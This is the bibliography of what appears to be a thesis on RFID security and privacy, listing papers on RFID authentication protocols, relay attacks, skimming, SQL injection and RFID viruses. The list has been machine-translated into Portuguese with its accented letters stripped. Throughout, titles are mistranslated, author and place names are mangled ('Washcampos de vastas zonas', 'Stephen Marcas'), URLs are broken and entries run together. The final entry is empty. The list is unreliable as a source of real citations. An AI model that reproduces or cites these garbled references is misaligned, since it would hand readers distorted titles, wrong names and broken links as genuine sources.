[1] Google Trends - rfid. http://www.google.com/trends?q=rfid. [2] PKI para documentos de viagem legveis por mquina oferecendo ICC acesso somente leitura, verso 1.1. Outubro 2004. [3] ISO / IEC FDIS 15693. Cartes de identificao - sem contato de circuito integrado (s) cartes - Cartes de proximidade, de 2001. [4] Manfred Aigner. RFID Tag Demo. 2007. http://jce.iaik.tugraz.at/de/products/rfid_ components/rfid_demo_tag__1. [5] Manfred Aigner e Martin Feldhofer. Simtrica autenticao segura para RFID tags. Em Telecomunicaes e Computao Mvel - TCMC 2005, Graz, ustria, Maro de 2005. [6] Basel Alomair, Loukas Lazos e Radha Poovendran. Ataques passivos em uma classe de protocolos de autenticao para RFID. Em Conferncia Internacional sobre Informao Segurana e criptologia - ICISC. [7] Chris Anley. Avanados de injeo SQL em aplicaes SQL Server. http://www. nextgenss.com / papers / advanced_sql_injection.pdf. [8] Anonymous. Concepo de RFID UHF emuladores com aplicaes para RFID-teste ing e de transporte de dados. ? http://ieeexplore.ieee.org/Xplore/login.jsp?url=/iel5/10364/ 32967/01544424.pdf. [9] Anonymous. FDA aprova trs-em-uma terapia de HIV. Em Notcias de drogas Store. http: / / Www.findarticles.com/p/articles/mi_m3374/is_19_22/ai_68876802. [10] Anonymous. cars.In Ido em 20 minutoutilizao laptops Faixahttp://www.leftlanenews.com/2006/05/03/ da esquerda News. ido-in-20-minutos-usando-laptops-a-roubar carros /. para roubar

[11] Anonymous. A histria da tecnologia RFID. RFID Journal. [12] Anonymous. Washer RFID. 2006. http://www.rfidwasher.com/. [13] 'ly B' Mih r 'sz, Bal' zs Boros, P 'ter Ligeti, Krisztina L' ja, e niel D 'Nagy. Pas-aaaaeoa sive ataque contra o protocolo de autenticao mtua M2AP para tags RFID. Em Primeiro Internacionais EURASIP Workshop sobre Tecnologia RFID, Viena, ustria, setemNovembro de 2007.

134

BIBLIOGRAPHY

[14] Victor R. Basili e Barry T. Perricone. Os erros de software e complexidade: Uma eminvestigao emprica. Commun. ACM, 27 (1) :42-52, de 1984. [15] Lejla Batina, Jorge Guajardo, Tim Kerins, Mentens Nele, Pim Tuyls, e Ingrid Verbauwhede. Um processador de curva elptica adequado para etiquetas RFID. Criptologia ePrint Archive, Relatrio 2006/227, de 2006. [16] Lejla Batina, Jorge Guajardo, Tim Kerins, Mentens Nele, Pim Tuyls, e Ingrid Verbauwhede. Criptografia de chave pblica para RFID-tags. Apostila impressa do Trabalho loja em RFID Segurana - RFIDSec 06, julho 2006. [17] Hal Berghel. Sem fio infidelidade conduo i-guerra. Communications of the ACM, 47:21-26, setembro 2004. [18] Christopher Bolan. O Efeito Lzaro - Resurrecting Etiquetas RFID. 2006.

% http://scissec.scis.ecu.edu.au/wordpress/conference_proceedings/2006/aism/Bolan 20 -% 20de%%% 20Lazarus 20Effect 20 -% 20Resurrecting% 20Tags.pdf% 20RFID.

[19] Leonid Bolotnyy e Gabriel Robins. Fisicamente unclonable baseado em funo serana e privacidade em sistemas RFID. Em Conferncia Internacional sobre Pervasive Informtica e Comunicaes - PerCom 2007, pginas 211-220, New York, NY, EUA, maro de 2007. IEEE, IEEE Computer Society Press. [20] Steve Bono, Matthew Green, Adam Stubblefield, Ari Juels, Avi Rubin, e Michael Szydlo. Anlise de segurana de um dispositivo de RFID criptograficamente habilitado. Em 14 USENIX Simpsio de Segurana, pginas 16/01, Baltimore, MD, EUA, julho 2005. USENIX. [21] Dean Boys. Identificao amigo ou inimigo (IFF) perguntas e respostas. [22] Stephen Marcas e David Chaum. Distncia delimitadora protocolos. Em Avanos na Criptologia - Eurocrypt 93, volume de 765 de Notas de Aulas em Computer Scireferncia, pginas 344-359. Springer-Verlag, Maio de 1993. [23] Bringer Julien, Chabanne Herv ', e Dottax Emmanuelle. HB+ + : A lightweighte protocolo de autenticao seguro contra alguns ataques. Em Conferncia Internacional IEEEreferncia sobre Servios Pervasive, Workshop sobre Segurana, Privacidade e Confiana em Pervasive e Computao Ubqua - SecPerU 2006, Lyon, Frana, junho de 2006. IEEE, IEEE Computer Society Press. [24] Dario Carluccio, Timo Kasper, e Christof Paar. Detalhes de implementao de um Multi-Purpose ISO 14443 Ferramenta de RFID. Em Apostila impressa do Workshop sobre RFID Segurana (RFIDSec 06), Julho 2006. [25] Dario Carluccio, Kerstin Lemke, e Christof Paar. Canal lateral eletromagntica anlise de um carto inteligente sem contato: primeiros resultados. Apostila da Oficina ECRYPT em RFID e Crypto Leve, julho 2005. [26] revista c't. Bauanleitung pele einen simplen rfid-Detektor. (9), abril 2004. [27] Das Raghu e Peter Harrop. Previses Rfid, jogadores, e as oportunidades de 2006-2016. Em IDTechEx. http://www.idtechex.com/products/en/view.asp?productcategoryid=93.

BIBLIOGRAPHY

135

[28] Benessa Defend, Kevin Fu, e Ari Juels. Criptoanlise de duas leves RFID esquemas de autenticao. Em Workshop Internacional sobre Pervasive Computing e Comunicao Segurana - PerSec 2007, pginas 211-216, New York, EUA, maro de 2007. IEEE, IEEE Computer Society Press. [29] Tweede Kamer der Staten-Generaal. Transcrio - OV-chipcard debat. Jan 2008. http://www.tweedekamer.nl/kamerstukken/verslagen/plenaire_vergadering_17_ januari_2008.jsp # 0. [30] W. Diffie. Os primeiros dez anos de criptografia de chave pblica. pginas 510-527, 1988. [31] Tassos Dimitriou. Quadro proxy para melhor rfid segurana e privacidade. Em 5 IEEE Consumer Communications and Conference Networking, Las Vegas, Nevada, EUA, janeiro 2008. [32] Sandra Dominikus, Elisabeth Oswald, e Martin Feldhofer. Simtrica a aucao para os sistemas RFID na prtica. Apostila da Oficina ECRYPT sobre RFID Leve e Crypto, julho 2005. [33] ECMA-340. Near Field Communication Interface e Protocolo (NFCIP-1), Dezembro 2004. [34] ECOS. http://ecos.sourceware.org/. [35] El-Manar Chammas, Bassam El-Khoury, e Antoun Halaby. Implementao de Serana em sistemas RFID, o "Emulator Tag". Em Conferncia Student 3 FEA, Maio 2004. [36] EPCglobal. 13,56 MHz banda ISM classe de freqncia de rdio 1 (RF) etiqueta de identificao especificao de interface. [37] Benjamin Fabian, Oliver G nther, e Sarah Spiekermann. Anlise de Segurana OFU o servio de nome de objeto de RFID. Em Privacidade, segurana e confiana em Pervasive e Computao Ubqua, Julho 2005. [38] Martin Feldhofer. Um protocolo de autenticao em uma camada de segurana para inteligentes RFID tags. Em A 12 Conferncia IEEE Mediterrneo Electrotcnica - MELECON 2004, volume 2, pginas 759-762, Dubrovnik, Crocia, Maio de 2004. IEEE. [39] Martin Feldhofer, Manfred Aigner, e Sandra Dominikus. Uma aplicao de RFID tags usando autenticao segura simtrica. Em Workshop Internacional sobre Segurana, Privacidade e Confiana em Pervasive Computing e Ubqua - SecPerU'05, pginas 43-49, Ilha de Santorini, na Grcia, julho 2005. IEEE, IEEE Computer Society Press. [40] Martin Feldhofer, Sandra Dominikus, e Johannes Wolkerstorfer. Auten-forte cao para os sistemas RFID usando o algoritmo AES. Em Marc Joye e Jean-Jacques Quisquater, editores, Workshop sobre hardware criptogrfico e Sistemas Embarcados - CHES 2004, o volume de 3156 Notas de Aulas em Cincia da Computao, pginas 357-370, Boston, MA, EUA, agosto 2004. IACR, Springer-Verlag. [41] Klaus Finkenzeller. RFID Handbook-Fundamentos e Aplicaes em ContactCartes menos inteligentes e Identificao. John Wiley & Sons, Ltd., 2003.

136

BIBLIOGRAPHY

[42] Flexilis. Defcon 13. [43] Christian Floerkemeier, Roland Schneider, e Marc Langheinrich. Digitalizao com um propsito - apoiar os princpios de informao justas em protocolos de RFID. Em Hitomi Murakami, Hideyuki Nakashima, Hideyuki Tokuda, e Michiaki Yasumura, editores, Simpsio Internacional sobre Sistemas de Computao Ubqua - UCS 2004, o volume de 3598 Notas de Aulas em Cincia da Computao, pginas 214-231, Tquio, Japo, Novembro de 2004. Springer-Verlag. [44] FoeBuD. Dados privatizador, Julho 2005. https / / shop.foebud.org / product_info.php / cPath / 30/products_id/88. [45] Sepideh Fouladgar e Hossam Afifi. Uma delegao eficiente e transferncia de prpria protocolo de navegao Ership para tags RFID. Em Primeiro Seminrio Internacional sobre RFID EURASIP Tecnologia, Viena, ustria, setembro de 2007. [46] Simson Garfinkel. Um projeto de lei de direitos de RFID. Technology Review, pgina 35, outubro 2002. [47] Simson Garfinkel, Ari Juels e Ravi Pappu. RFID de privacidade: Uma viso geral do problemas e solues propostas. IEEE Security and Privacy, Trs (3) :34-43, maioJunho de 2005. [48] G. Gaubatz, J.-P. Kaps, E. Ozturk e B. Sunar. Estado da arte em chave pblica cripseqencial para redes de sensores sem fio. Em Proceedings of the Second IEEE InterSeminrio nacional sobre Pervasive Computing e Segurana Comunicao (PerSec 2005), 2005. [49] Henri Gilbert, Matthew Robshaw e Sibert Herv '. Um ataque ativo contra HB+e - Um protocolo de autenticao comprovadamente seguro e leve. Manuscrito, julho 2005. [50] AIM Global. Especialistas internacionais dizem rfid seus animais de estimao e os computadores so seguros contra vrus de RFID. Maro de 2006. {Http://www.aimglobal.org/members/news/templates/ rfidinsights.asp? ArticleID = 959 & ZoneID = 24}. [51] P. Golle, M. Jakobsson, A. Juels e P. Syverson. Universal nova criptografia para mixnets. Em Anais da Conferncia RSA 2004, 2004. [52] Jeff Goodell. Como um passaporte falso. Em New York Times. http://query.nytimes.com/ gst / fullpage.html? sec = viagem e res = 980CE6D6133DF933A25751C0A9649C8B63. [53] G. Mark Graff e Kenneth R. Van Wyk. Coding Secure: Princpios e Prticas. O'Reilly, 2003. [54] Samuel Greengard. Impulsionando mudanas na indstria automobilstica. Em RFID Journal, Abril 2004. http://www-03.ibm.com/solutions/businesssolutions/sensors/doc/content/ bin / RFID_Journal_driving_change_in_the_auto_industry.pdf. [55] Johann Grosch dle e Stefan Tillich. Desenho de conjunto de instrues extenses anda unidades funcionais de energia eficiente de criptografia de chave pblica. Em Workshop sobre RFID e leve Crypto, Julho 2005. [56] Lukas Grunwald. RF-Dump. 2002. http://www.rf-dump.org/.

BIBLIOGRAPHY

137

[57] John Halamka, Ari Juels, Adam Stubblefield, e Jonathan Westhues. A segurana implicaes da VeriChipTM clonagem. Manuscrito em submisso, maro de 2006. [58] Gerhard Hancke e Markus Kuhn. Uma distncia RFID delimitadora protocolo. Em ConConferncia sobre Segurana e Privacidade para as reas Emergentes em Redes de Comunicao - SecureComm 2005, Atenas, Grcia, Setembro de 2005. IEEE. [59] Gerhard P. Hancke. Ataques prtica sobre sistemas de identificao de proximidade (curto de papel). Em Proc. IEEE Symposium on Security and Privacy, pginas 328-333, Washcampos de vastas zonas, DC, EUA, 2006. [60] Edward Hasbrouck. O blog nmade prtica. [61] M. Lance Havok. Arquivo ms de erros do kernel. 2006. http://projects.info-pull. com.br / mokb /. [62] Thomas Heydt-Benjamin, Hee-Jin Chae, Benessa defender, e Kevin Fu. Privacidade para o transporte pblico. Em Workshop sobre Tecnologias que aumentam a privacidade - PET 2006, Cambridge, Reino Unido, Junho de 2006. [63] Thomas S. Heydt-Benjamin, Dan V. Bailey, Kevin Fu, Ari Juels, e Tom OHare. Vulnerabilidades na primeira gerao de placas RFID crdito. Relatrio tcnico, Octubro de 2006. http://prisms.cs.umass.edu/ ~ kevinfu / papers / RFID-CC-manuscript.pdf. [64] Thomas S. Heydt-Benjamin, Dan V. Bailey, Kevin Fu, Ari Juels, e Tom O'Hare. Vulnerabilidades na primeira gerao de placas RFID crdito. Manuscrito, Outubro 2006. [65] Martin Hlavac e Tomas Rosa. Uma nota sobre os ataques de retransmisso de e-passaportes -A Caso da Repblica Checa e-passaportes. 2007. http://eprint.iacr.org/2007/244.pdf. [66] Douglas R. Hofstadter. Godel, Escher, Bach: An Braid Ouro Eterno. Bsico Livros, Inc., New York, NY, EUA, 1979. [67] Ernest F. Hollings. Senado dos EUA Comrcio Audincia sobre Segurana Seaport, Julho 2001. http://commerce.senate.gov/hearings/072401EFH.pdf. [68] Michael Howard e David LeBlanc. Escrevendo cdigo seguro. Microsoft Press, 2002. [69] Michael Hutter, Stefan Mangard, e Martin Feldhofer. Poder e ataques EM na passiva 13,56 MHz dispositivos RFID. Em Pascal Paillier e Verbauwhede Ingrid, editores, Workshop sobre hardware criptogrfico e de Sistemas Embarcados - CHES 2007, o volume de 4727 Notas de Aulas em Cincia da Computao, pginas 320-333, Viena, ustria, setembro de 2007. Springer-Verlag. [70] Ceriel Jacobs. LLgen. http://www.cs.vu.nl/ ~ ceriel / LLgen.html. [71] Nis Jorgensen. Autoducumentadas programa em SQL. archive478-2005-5-25456.html.
http://www.droptable.com/

[72] Ari Juels. Criptografia minimalista para tags RFID de baixo custo. Em A Quarta InterConferncia Nacional de Segurana em Redes de Comunicao (SCN 2004), Palestra Notas em Cincia da Computao, Amalfi, Italia, setembro de 2004. Springer-Verlag.

138

BIBLIOGRAPHY

[73] Ari Juels. Privacidade e Tecnologias de Identidade, uma conversa Cross-Disciplinar (Eds K. Strandburg e D. Stan Raicu), captulo RFID Privacidade: A Primer Tcnica para o leitor no-tcnico. Springer-Verlag, 2005. [74] Ari Juels. RFID segurana e privacidade de uma pesquisa. IEEE Journal em Selected reas de Comunicao, 2006. http://www.rsasecurity.com/rsalabs/staff/bios/ajuels/ publications/pdfs/rfid_survey_28_09_05.pdf. [75] Ari Juels e John Brainard. Bloqueio Soft: etiquetas bloqueador flexvel no barato. Em Sabrina De Capitani di Vimercati e Paul Syverson, editores, Workshop sobre Privacidade na Sociedade Eletrnica - WPES, pginas 07/01, Washington, DC, EUA, outubro 2004. ACM, ACM Press. [76] Ari Juels e Ravikanth Pappu. Guinchando euros: Proteo de Privacidade em RFID notas habilitado. Em Rebecca N. Wright, editor, Financial Cryptography FC'03, o volume de 2742 Notas de Aulas em Cincia da Computao, pginas 103-121, Le Gosier, Guadalupe, nas Antilhas Francesas, Janeiro de 2003. IFCA, Springer-Verlag. [77] Ari Juels, Ronald L. Rivest, e Michael Szydlo. O bloqueador de bloco-tag-seletiva ing de tags RFID para a privacidade do consumidor. Em Anais da Conferncia ACM 10 no computador e segurana de comunicaes. ACM Press, 2003. [78] Ari Juels, Paul Syverson, e Dan Bailey. Proxies de alta potncia para melhorar RFID privacidade e utilidade. Em Proc. da Oficina de 5 em que aumentam a privacidade Technologias, 2005. [79] Ari Juels e Stephen Weis. Autenticao de dispositivos invasivos com proto-humanos cols. Em Victor Shoup, editor, Avanos na criptologia - CRYPTO'05, volume de 3126 de Notas de Aulas em Cincia da Computao, pginas 293-308, Santa Barbara, CA, EUA, Agosto de 2005. IACR, Springer-Verlag. [80] G nter Karjoth e tags RFID Paul Moskowitz.uDisabling com visvel confirmao cortada tags so silenciados. Em Workshop sobre privacidade no sector das Sociedade, Novembro 2005. [81] Jonathan Katz e Adam Smith. Analisando o HB e HB + protocolos no grande " caso de erro ". Criptologia ePrint Archive, Relatrio 2006/326, de 2006. [82] Dawn Kawamoto. Os criadores de vrus seguir o dinheiro. Em CNET News. http://news. zdnet.com/2100-1009_22-5628512.html. [83] Mike Kershaw. Kismet. 2007. http://www.kismetwireless.net/. [84] Ziv Kfir e Avishai Wool. Batedor de carteiras virtuais usando ataques relay em consmartcards sem tato. Em Proc. IEEE SecureComm, pginas 47-58, Los Alamitos, CA, EUA, 2005. [85] Soo-Cheol Kim, Sang-Soo Yeo, e Sung Kim Kwon. MARP: Agente Mvel para rfid proteo da privacidade. Josep em Domingo-Ferrer, Joachim Posegga, e Daniel Schreckling, editores, Conferncia Internacional sobre Pesquisa de Smart Card e AdAplicaes avanadas - Cardis, Notas de Aulas em Cincia da Computao, Tarragona, Espanha, Abril de 2006. IFIP, Springer-Verlag.

BIBLIOGRAPHY

139

[86] Ilan Kirschenbaum e Avishai Wool. Como construir um baixo custo, de maior alcance rfid skimmer. Em Proc. 15 USENIX Simpsio de Segurana, pginas 43-57, Vancouver, Canad, agosto 2006. [87] Michelle Krebs. Roubo de veculos em alta. Em Cars.com, Maro 2005.

http://www.cars.com/go/advice/Story.jsp?section=safe&story=secStat&subject = safe_sec & referer = & aff = msnbc.

[88] Rakesh Kumar. Interao da tecnologia RFID e polticas pblicas. Em RFID de Privacidade Workshop, Novembro de 2003. [89] Sandeep Kumar e Christof Paar. So padres de curva elptica compatvel criptosystems vivel em RFID? Apostila impressa do Workshop sobre RFID Segurana RFIDSec 06, julho 2006. [90] Daesung Kwon, Daewan Han, Jooyoung Lee, e Yongjin Yeom. Vulnerabilidade de um protocolo de autenticao RFID proposto em secubiq 2005. Em Internacional Workshop sobre Segurana em Sistemas de Computao Ubqua - Secubiq 2006, Palestra Notas em Cincia da Computao, Seul, Coria, agosto de 2006. Springer-Verlag. [91] Jeremy Landt. Mortalhas de tempo - a histria do RFID. [92] Adam Laurie. RFIDIOt. 2006. http://rfidiot.org/. [93] Mikko Lehtonen, Thorsten Staake, Florian Michahelles, e Elgar Fleisch. A partir de identificao para autenticao - uma reviso de RFID de autenticao de produtos technicas. Apostila impressa do Workshop sobre RFID Segurana - RFIDSec 06, julho 2006. [94] Mikko Lehtonen, Thorsten Staake, Florian Michahelles, e Elgar Fleisch. Reforar a segurana dos documentos de leitura ptica atravs da combinao RFID e dispositivos de memria ptica. Em Ambient Intelligence Conference Empreendimentos AmI.d, Sophia-Antipolis, Frana, setembro de 2006. [95] Tim Lemke. Spammers fazem lucros sem fazer uma venda. Em New York Times. http://www.washtimes.com/business/20030803-110550-8329r.htm. [96] Steven Levy. Crypto-how os rebeldes cdigo de vencer o governo - a privacidade de poupana na era digital. Viking, de 2001. [97] Chae Hoon Lim e Tymur Korkishko. mcrypton - uma cifra de bloco leve para segurana de tags RFID de baixo custo e sensores. Em Workshop sobre Segurana da Informao Aplicaes - WISA'05, Notas de Aulas em Cincia da Computao, Jeju Island, Coria, Agosto de 2005. Springer-Verlag. [98] Chae Hoon Lim e Taekyoung Kwon. Forte e robusto de autenticao RFID permitindo a transferncia de propriedade perfeita. Em Conferncia sobre Informao e Comucaes de segurana - ICICS'06, Notas de Aulas em Cincia da Computao, Raleigh, NC, EUA, dezembro de 2006. Springer-Verlag. [99] Rick Lingle. Sonda do MIT campo econmico RFID. Mundial de embalagem, 2005. [100] Metasploit LLC. Metasploit. 2003. http://www.metasploit.com/.

140

BIBLIOGRAPHY

[101] Stephen Lowe. So carregadores de contentores e destinatrios cantos de corte de custos para sacfcio a segurana ea segurana dos cidados de EUA e Europa? Em Instrues Magazine, Maio de 2005. http://www.directionsmag.com/press.releases/index.php?duty = Show & id = 11727. [102] David Madore. Quines (programas auto-reprodutores). http://www.madore.org/ ~ david / computadores / quine.html. [103] Andy McCue. Unio pede proibio a nvel europeu com o pessoal de controle de RFID. Silicon.com. [104] Maire McLoone e Matt Robshaw. Chave pblica de criptografia e etiquetas RFID. Em Masayuki Abe, editor, Acompanhe o criptgrafos na Conferncia RSA CT-RSA, Notas de Aulas em Cincia da Computao, San Francisco, CA, EUA, fevereiro 2007. Springer-Verlag. [105] Melexis. Nota-A aplicao de reforo de energia para MLX90121, 001 edio, abril 2004. http://www.melexis.com. [106] Melexis. MLX90121-13.56MHz RFID transceptor, 006 edio, dezembro 2005. http: / / Www.melexis.com. [107] Christian Metzger, Christian Florkemeier, Philippe Bourquin, e Elgar Fleisch. Fazendo Radio Frequency Identification Visible - A Tag Watchdog. 2007. http: / / Www.autoidlabs.org/uploads/media/AUTOIDLABS-WP-HARDWARE-037.pdf. [108] Microsoft Corporation. Como evitar cross-site scripting questes de segurana. http://support.microsoft.com/default.aspx?scid=kb; en-us; Q252985. [109] Minime e Mahajivana. RFID Zapper. Em 22 Chaos Communication Congress (22C3), Dezembro 2005. [110] David Molnar, Andrea Soppera, e David Wagner. Uma soluo escalvel, delegatable protocolo pseudnimo permitindo transferir a propriedade de etiquetas RFID. Em Bart Preneel e Stafford Tavares, editores, reas selecionadas em Criptografia - SAC 2005, volume 3.897 de Notas de Aulas em Cincia da Computao, pginas 276-290, Kingston, Canad, Agosto de 2005. Springer-Verlag. [111] David Molnar e David Wagner. Privacidade e segurana na biblioteca de RFID-problemas, prticas e arquiteturas. Em Conf. em Informtica e Comunicaes de Segurana, pginas 210-219, Washington, DC, EUA, outubro 2004. [112] David Molnar e David Wagner. Privacidade e segurana na biblioteca de RFID: Questes, prticas e arquiteturas. Em Birgit Pfitzmann e Liu Peng, editores, Conferncia em Informtica e Comunicaes de Segurana - ACM CCS, pginas 210-219, Washcampos de vastas zonas, DC, EUA, outubro de 2004. ACM, ACM Press. [113] H. D. Moore. Ms dos Bugs em Browser. 2006. http://browserfun.blogspot.com/. [114] Jorge Munilla, Andres Ortiz e Alberto Peinado. Distncia delimitadora protocolos com vcuo-desafios para a RFID. Apostila impressa do Workshop sobre RFID Segurana RFIDSec 06, julho 2006. [115] Nabaztag. O primeiro coelho inteligente. http://www.nabaztag.com.

BIBLIOGRAPHY

141

[116] Nicholas Nethercote e Julian Seward. Valgrind: A superviso do programa-quadro de trabalho. Nota eletrnica em Comp Terica. Sci., 89 (2), 2003. [117] Karsten Nohl, Hendryk Plotz, e Starbug. Declarao sobre Segurana OV Card. http: / / Www.cs.virginia.edu/ ~ kn5f/OV-card_security.html. [118] Mary O'Connor. Glaxosmithkline testes rfid em drogas hiv. Em RFID Journal. http: / / Www.rfidjournal.com/article/articleview/2219/1/1/. [119] Departamento de Material Blico e Gunnery. Naval e munies gunnary, captulo 16, radar e pticas. 2, 1958. [120] National Institute of Standards and Technology. Projecto publicao especial 800-98, Orientao para Proteger Radio Frequency Identification (RFID) Systems, Setembro 2006. http://csrc.nist.gov/publications/drafts/800-98/Draft-SP800-98.pdf. [121] Yossi Oren. Anlise de alimentao remota de tags RFID. Criptologia ePrint Archive, Relatrio 2007/330, 2007. [122] Su Jeong Park, Su Mi Lee, Eun Young Choi, e Dong Hoon Lee. Re-auto protocolo de criptografia forte para proporcionar privacidade baixo custo do sistema RFID. Em Marina L. Gavrilova, Osvaldo Gervasi, Vipin Kumar, Chih Jeng Kenneth Tan, David Taniar, Antonio Lagana, Youngsong Mun, e Hyunseung Choo, editores, InternaConferncia Nacional de Cincia Computacional e suas Aplicaes - ICCSA 2006, o volume de 3983 Notas de Aulas em Cincia da Computao, pginas 316-325, Glasgow, Esccia, Maio de 2006. Springer-Verlag. [123] Bruce Perens. Cerca eltrica.
http://perens.com/FreeSoftware/ElectricFence/.

[124] Pedro Peris-Lopez, Julio Cesar Hernandez-Castro, Juan Estevez-Tapiador e Arturo Ribagorda. Sistemas RFID: Uma pesquisa sobre ameaas segurana e props sosolues. Em 11 Conferncia Internacional sobre IFIP pessoais sem fio Comunidades ctions - PWC.06, o volume de 4217 Notas de Aulas em Cincia da Computao, pginas 159-170. Springer-Verlag, setembro de 2006. [125] Selwyn Piramuthu. HB e relacionados protocolos de autenticao e leve para proteger RFID autenticao tag / leitor. Em Electronic Technology Collaborative Commerce e Pesquisa - collecter 2006, Basilia, Sua, junho de 2006. [126] C. Bogdan Popescu, Bruno Crispo e Andrew S. Tanenbaum. Um certificado de reesquema de vocao para uma grande escala de sistema altamente replicados distribudos. Em ISCC, pginas 225-231, 2003. [127] Axel Poschmann, Gregor Leander, Kai Schramm, e Christof Paar. Uma famlia de cifras leve bloco baseado em DES adequado para aplicaes RFID. Impresso apostila do Workshop sobre RFID Segurana - RFIDSec 06, julho 2006. [128] Kevin Poulsen. Confisso de culpa em alcaparra Kinko keystroke. Em SecurityFocus, Julho 2003. http://www.securityfocus.com/news/6447.

142

BIBLIOGRAPHY

[129] D.G. Rajesh. Conceitos avanados para evitar a injeo SQL.


http://www.csharpcorner.com/UploadFile/rajeshdg/Page107142005052957AM/Page1. aspx? ArticleID = 631d8221-64ed-4db7-b81b-8ba3082cb496.

[130] Srikumar S. Rao. CounterSpy. Em Forbes Magazine, Fevereiro 2005. http://www.landfield. com/isn/mail-archive/2001/Jan/0113.html. [131] Jason Reid, Juan Gonzalez neito, Tee Tang, e Bouchra Senadji. Deteco de relay ataques com protocolos baseados tempo. QUT ePrint, Relatrio 3264, 2006. [132] Melanie Rieback, Bruno Crispo e Andrew Tanenbaum. o seu gato infectado com um vrus de computador? Em Proc. IEEE Pervasive Computing and Communications, pginas 169-179, Pisa, Itlia, maro de 2006. http://www.rfidguardian.org/papers/percom. 06.pdf. [133] Melanie R. Rieback, Bruno Crispo e Andrew S. Tanenbaum. Keep on blockin ' no controle de acesso livre no mundo pessoal para etiquetas RFID de baixo custo. Em Proc. 13 Cambridge Workshop sobre Protocolos de Segurana, Abril 2005. [134] Melanie R. Rieback, Bruno Crispo e Andrew S. Tanenbaum. RFID Guardian: Um dispositivo movido a bateria mvel para RFID gesto privacidade. Em Proc. 10 Conf Australasian. em Segurana da Informao e Privacidade (ACISP 2005), volume 3.574 de LNCS, pginas 184-194, julho 2005. [135] Junichiro Saito, Jae-Cheol Ryou, e Kouichi Sakurai. Reforo da privacidade dos universal esquema de re-encriptao de tags RFID. Em Laurence Jang, Minyi Guo, Guang Gao, e Niraj Jha, editores, Informticos incorporados e Ubqua - EUC 2004, o volume de 3207 Notas de Aulas em Cincia da Computao, pginas 879-890, AizuWakamatsu City, Japo, agosto de 2004. Springer-Verlag. [136] Kazuo Sakiyama, Lejla Batina, Mentens Nele, Bart Preneel, e Ingrid Verbauwhede. Pequena footprint-ALU para processadores de chave pblica para segurana generalizada. Apostila impressa do Workshop sobre RFID Segurana - RFIDSec 06, julho 2006. [137] Scott Saponas, Jonathan Lester, Carl Hartung e Tadayoshi Kohno. Dispositivos que dizer sobre voc: o Nike + iPod Sport Kit. [138] Sanjay Sarma, Stephen Weis e Daniel Engels. Sistemas RFID e de segurana e implicaes de privacidade. Em Proc. Hardware criptogrfico e Sistemas Embarcados (CHES 2002), o volume de 2523 LNCS, pginas 454-469, agosto 2002. [139] Sanjay Sarma, Stephen Weis e Daniel Engels. Radio-frequency identification: riscos de segurana e desafios. Cryptobytes, Laboratrios RSA, 6 (1) :2-9, Primavera 2003. [140] Peter Schaar. Documento de trabalho sobre questes de proteco de dados relacionados com RFID techlogia. Documento de Trabalho do Artigo 29 - 10107/05/EN, Unio Europeia de Dados ProPartido proteo de Trabalho, janeiro de 2005. [141] Beyond Security. Resumo beSTORM. 2007. http://www.beyondsecurity.com/ bestorm_overview.html.

BIBLIOGRAPHY

143

[142] Semiconductor CISC. RFID Tag Emulator. ? http://www.morerfid.com/details.php? subdetail = Relatrio & action = detalhes & report_id = 3825 . [143] Stephen Sherman. Entrevista com o col. Mahurin "bud" andador. [144] Pieter Siekermann e Maurits van der Schee. MSc. Relatrio do Projeto. http://staff. science.uva.nl / ~ delaat/sne-2006-2007/p41/report.pdf. [145] Kragen Sitaker. Como encontrar falhas de segurana. http://www.canonical.org/ ~ Kragen / security-holes.html. [146] John Solis e Gene Tsudik. Revogao simples e flexvel de verificar com privacidade. Em Aumentam a privacidade Technologies, pginas 351-367, 2006. [147] Andrea Soppera e Trevor Burbridge. Sem fio de identificao - privacidade e segurana. BT Technology Journal, 23 (4) :54-64, outubro de 2005. [148] Andrea Soppera e Trevor Burbridge. Desativado por padro - RAT: RFID tag aceitador. Apostila impressa do Workshop sobre RFID Segurana - RFIDSec 06, julho 2006. [149] Sarah Spiekermann e Oliver Berthold. Privacidade manter em RFID ambientes - proposta de modelo de desativar. Em Workshop sobre Segurana e Privacidade, Conf. em Pervasive Computing, Abril 2004. [150] Thorsten Staake, ric 'd' Fr Thiesse, e Elgar Fleisch. Estendendo o epc networke e - O potencial do RFID no combate contrafaco. Em Hisham Haddad, Lorie Liebrock, Andrea Omicini, e Roger Wainwright, editores, Simpsio sobre Aplicada Computing - SAC, pginas 1607-1612, Santa Fe, NM, EUA, maro de 2005. ACM, ACM Press. [151] McGraw-Hill do Pessoal. Relatrio de guerra radar-contramedidas. Eletrnica, pginas 92-97, Janeiro 1946. [152] Harry Stockman. Comunicaes atravs da potncia refletida. Em Proc. da IRE, pginas 1196-1204, outubro 1948. [153] David Strom. 5 tecnologias disruptivas para assistir em 2007. Em InformationWeek, Jan 2007. http://www.informationweek.com/news/showArticle.jhtml?articleID=196800208. [154] Bob Sullivan. Os truques secretos que os spammers usam. Em MSNBC News. http://www. msnbc.msn.com/id/3078640 /. [155] Dan Takahashi. Charles Walton, o Pai de RFID. Em San Jose Mercury News, Junho 2004. http://www.primidi.com/2004/06/14.html. [156] Ken Traub. A estrutura de arquitetura EPCglobal - verso 1. [157] Alex Tsow, Markus Jakobsson, Liu Yang, e Susanne Wetzel. Warkitting-o drive-by subverso de roteadores sem fio domstica. Anti-Phishing e Online Fraud, Parte II Journal of Digital Forensic Practice, 1, novembro 2006. [158] Gene Tsudik. YA-TRAP: Ainda outro protocolo de autenticao trivial RFID. Em Conferncia Internacional sobre Pervasive Computing e Communications - PerCom 2006, Pisa, Itlia, maro de 2006. IEEE, IEEE Computer Society Press.

144

BIBLIOGRAPHY

[159] Yu-Ju Tu e Selwyn Piramuthu. Distncia RFID delimitadora protocolos. Em Primeiro InOficina EURASIP internacional sobre tecnologia de RFID, Viena, ustria, Setembro 2007. [160] Pim Tuyls Lejla e Batina. RFID-tags para anti-falsificao. Em David Pointcheval, editor, Tpicos em criptologia - CT-RSA 2006, Track Os criptgrafos 'no RSA Conference 2006, Notas de Aulas em Cincia da Computao, San Jose, CA, EUA, Fevereiro de 2006. Springer-Verlag. [161] US-CERT. Nota vulnerabilidade VU # 181038 - Microsoft Windows Metafile manipulador SETABORTPROC Vulnerabilidade Fuga GDI. [162] Istv 'n Vajda e Levente Butty' n. Leve protocolos de autenticao para baixo aa custo tags RFID. Em Segundo Workshop sobre Segurana em Computao Ubqua - Ubicomp 2003, Seattle, WA, EUA, Outubro de 2003. [163] Istv 'n Vajda e Levente Butty' n. Leve protocolos de autenticao para baixo aa custo tags RFID. Em 2 Workshop sobre Segurana em Computao Ubqua, Outubro 2003. [164] 